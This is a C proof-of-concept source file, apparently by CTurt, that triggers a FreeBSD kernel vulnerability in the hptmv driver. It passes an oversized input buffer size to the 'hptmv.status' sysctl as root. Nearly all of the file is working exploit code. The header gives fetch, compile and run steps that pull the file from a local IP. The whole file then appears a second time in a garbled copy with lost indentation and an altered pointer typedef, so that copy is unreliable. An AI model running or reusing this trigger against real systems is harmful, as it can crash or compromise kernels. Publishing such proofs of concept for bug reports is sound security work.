CTurt/hptmv.c

## hptmv.c
/*
	FreeBSD kernel vulnerability PoC for:
	https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206585#c2

	Needs to be run as root.

	If hptmv kernel module not loaded:
		kldload hptmv

	Using:
		fetch -o hptmv.c http://192.168.0.4/hptmv.c
		clang hptmv.c -o hptmv
		./hptmv

	- CTurt
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/sysctl.h>

#define HPT_IOCTL_MAGIC 0xA1B2C3D4
typedef int DWORD;
typedef void *LPVOID, *LPDWORD;
typedef struct _HPT_IOCTL_PARAM {
	DWORD   Magic;                 /* used to check if it's a valid ioctl packet */
	DWORD   dwIoControlCode;       /* operation control code */
	LPVOID  lpInBuffer;            /* input data buffer */
	DWORD   nInBufferSize;         /* size of input data buffer */
	LPVOID  lpOutBuffer;           /* output data buffer */
	DWORD   nOutBufferSize;        /* size of output data buffer */
	LPDWORD lpBytesReturned;       /* count of bytes returned */
} HPT_IOCTL_PARAM;

int main(void) {
	int result = 0;
	errno = 0;

	void *buffer = malloc(0x4000);

	DWORD bytesReturned;

	HPT_IOCTL_PARAM params;
	params.Magic = HPT_IOCTL_MAGIC;
	params.dwIoControlCode = 0;
	params.lpInBuffer = buffer;
	params.nInBufferSize = 0xffffffff;
	params.lpOutBuffer = buffer;
	params.nOutBufferSize = 0x1;
	params.lpBytesReturned = &bytesReturned;

	size_t size = sizeof(params);

	printf("Triggering...\n");
	result = sysctlbyname("hptmv.status", NULL, NULL, &params, size);

	printf("result %d\n", result);
	printf("errno %d\n", errno);

	free(buffer);

	return 0;
}
	/*
	FreeBSD kernel vulnerability PoC for:
	https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206585#c2

	Needs to be run as root.

	If hptmv kernel module not loaded:
	kldload hptmv

	Using:
	fetch -o hptmv.c http://192.168.0.4/hptmv.c
	clang hptmv.c -o hptmv
	./hptmv

	- CTurt
	*/

	#include <stdio.h>
	#include <string.h>
	#include <stdlib.h>
	#include <errno.h>
	#include <dlfcn.h>
	#include <sys/types.h>
	#include <sys/sysctl.h>

	#define HPT_IOCTL_MAGIC 0xA1B2C3D4
	typedef int DWORD;
	typedef void LPVOID, LPDWORD;
	typedef struct _HPT_IOCTL_PARAM {
	DWORD Magic; /* used to check if it's a valid ioctl packet */
	DWORD dwIoControlCode; /* operation control code */
	LPVOID lpInBuffer; /* input data buffer */
	DWORD nInBufferSize; /* size of input data buffer */
	LPVOID lpOutBuffer; /* output data buffer */
	DWORD nOutBufferSize; /* size of output data buffer */
	LPDWORD lpBytesReturned; /* count of bytes returned */
	} HPT_IOCTL_PARAM;

	int main(void) {
	int result = 0;
	errno = 0;

	void *buffer = malloc(0x4000);

	DWORD bytesReturned;

	HPT_IOCTL_PARAM params;
	params.Magic = HPT_IOCTL_MAGIC;
	params.dwIoControlCode = 0;
	params.lpInBuffer = buffer;
	params.nInBufferSize = 0xffffffff;
	params.lpOutBuffer = buffer;
	params.nOutBufferSize = 0x1;
	params.lpBytesReturned = &bytesReturned;

	size_t size = sizeof(params);

	printf("Triggering...\n");
	result = sysctlbyname("hptmv.status", NULL, NULL, &params, size);

	printf("result %d\n", result);
	printf("errno %d\n", errno);

	free(buffer);

	return 0;
	}